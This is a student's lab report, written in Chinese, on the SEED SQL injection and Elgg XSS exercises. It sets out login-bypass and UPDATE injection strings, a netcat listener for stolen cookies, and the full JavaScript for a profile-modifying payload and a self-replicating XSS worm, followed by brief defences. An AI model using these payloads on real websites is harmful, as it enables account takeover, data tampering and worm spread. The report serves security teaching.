20242801 2024-2025-2 《网络攻防实践》第10次作业
一、实验内容
1. SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
-
熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
-
对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
-
对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
-
SQL对抗:修复上述SQL注入攻击漏洞。
2. SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
-
发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
-
弹窗显示cookie信息:将cookie信息显示。
-
窃取受害者的cookies:将cookie发送给攻击者。
-
成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
-
修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
-
编写XSS蠕虫。
-
对抗XSS攻击。
二、实验过程
(一) SEED SQL注入攻击与防御实验
1、配置实验环境
下载seedubuntu操作系统,解压后直接在vmware里打开 vmdk文件。
2、熟悉SQL语句
首先,我们在seedubuntu命令行登陆数据库,输入mysql -u root -p,然后输入密码seedubuntu即可完成登陆。
接着输入use Users切换到Users数据库。
然后输入show tables; 查询Users数据库中的数据表。
最后输入select * from credential; 查询credential表中的所有条目。
3、对 SELECT语句的SQL注入攻击
seedlabsqlinjection网站使用了刚才的数据库,我们打开该网站,打开F12-network,然后随便输入用户名和密码,查看输出。
可以发现,网站将用户名和密码通过GET请求提交到unsafe_home.php,所有我们查看下unsafe_home.php文件。
我们观察该php文件中的代码,可以发现如果用户是Admin,那么就会出现所有用户的信息。
由此,我们就可以确认用于注入的SQL语句为SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= 'Admin'#' and Password='$hashed_pwd';
但需要注意因为#的存在,' and Password='$hashed_pwd';这一段被当作注释了,所有用户只需要输入'Admin'#就可以进入管理员界面。
同理,我们将用户名换成任意用户都可以进入其对应的用户界面。
4、对UPDATE语句的SQL注入攻击
我们将刚才的方法登陆Alice账户。
同样我们打开监控,点击edit profile,再点击save。查看网站都进行了哪些操作。
可以看到,网站修改后的数据输入到了unsafe_edit_backend.php这个文件里。我们在终端打开这个文件。
通过分析上述代码可以发现,我们需要注入的sql语句为UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;
我们可以通过将nickname的输入改为', salary='9000' where Name='Alice';#,就可以将Alice的工资金额改为9000。
5、SQL对抗
这里面我们要修复文件中的漏洞代码。通过观察,我们可以发现程序没有禁止SQL语句出现;#等符号。我们将select语句修改如下:
(二)SEED XSS跨站脚本攻击实验
1、发布恶意消息,显示警报窗口
我们进入xsslabelg.com,首先使用alice登陆,选择edit profile,在brief description写入。
然后登陆boby账户,进入members,可以发现网站弹出了警告窗口,内容为xss。
2、弹出显示cookie消息
在boby账户下,重复弹出警告窗口的操作,在brief description内容改为,即可弹窗显示cookie消息。
3、窃取受害者的cookies
查询相关资源得到,当javascript插入img标签时,网站会尝试从src字段中的URL中加载图片。因此我们可以编写如下代码,插入brief description中。
接着,我们在终端输入nc -l 5555 -v监听5555端口。
然后我们重新登陆boby账户,访问alice主页,查看终端,我们发现可以成功窃取到boby的cookie。
4、成为受害者朋友
我们先登陆alice账户,然后访问boby主页,f12打开网络监控,点击add friend按钮,查看监控内容变化。可以发现,网站向xsslabelgg发送了一个GET请求,其中,friend=45,45是boby的id。
因此,我们可以编写用于非法添加好友的js代码。然后我们可以把这段代码放到alice的主页的about me中,但需要先点击edit html,再把代码插入。
然后,我们再登陆boby账户,使用boby账户访问alice的主页,可以发现boby成功添加上了alice的好友。
5、修改受害者信息
我们编写如下的js代码,然后将其插入到alice的主页中,再使用boby访问alice主页,就会发现boby的主页信息被更改。
<script type="text/javascript">
window.onload = function(){
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content=token+ts+"name="+userName+"&description=<p>This have been cracked by 20242801 ysw.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
var aliceGuid=44;
if(elgg.session.user.guid!=aliceGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
6、编写XSS蠕虫
同理,我们先编写如下代码插入alice的主页中。
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>20242801 ysw"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var aliceGuid=44;
if(elgg.session.user.guid!=aliceGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
然后,我们登陆boby的账户,访问alice主页,可以发现自己的about me被篡改。之后,我们再使用Admin账户登陆,密码是seedelgg,访问Boby的账户,就会发现自己的about me也被篡改。
8、对抗XSS攻击
我们在Admin账户下,打开account中的plugins,activate其中的HTMLLawed插件,就可以对用户输入的内容进行校验,去除特殊标签防范xss攻击。
然后我们再次访问alice的主页,就会发现xss攻击被成功防御。
三、学习感悟
- 通过本次实验,我学会了sql注入攻击的基本流程,包括访问网页,通过网络监控查看网站行为,分析相关代码找到逻辑漏洞,从而编写相关的攻击语句,实现sql注入。
- 在xss攻击的实验中,我了解了xss攻击的基本概念,通过实际注入代实现了xss攻击,但对于js代码的编写逻辑仍有部分不理解,后续会进一步学习。
- 本次学习的完整录屏视频已上传至百度网盘(时间较长文件较大),通过网盘分享的文件:第十次作业
链接: https://pan.baidu.com/s/14v4qRXurKEw5CU02OOWtXA?pwd=1234 提取码: 1234
浙公网安备 33010602011771号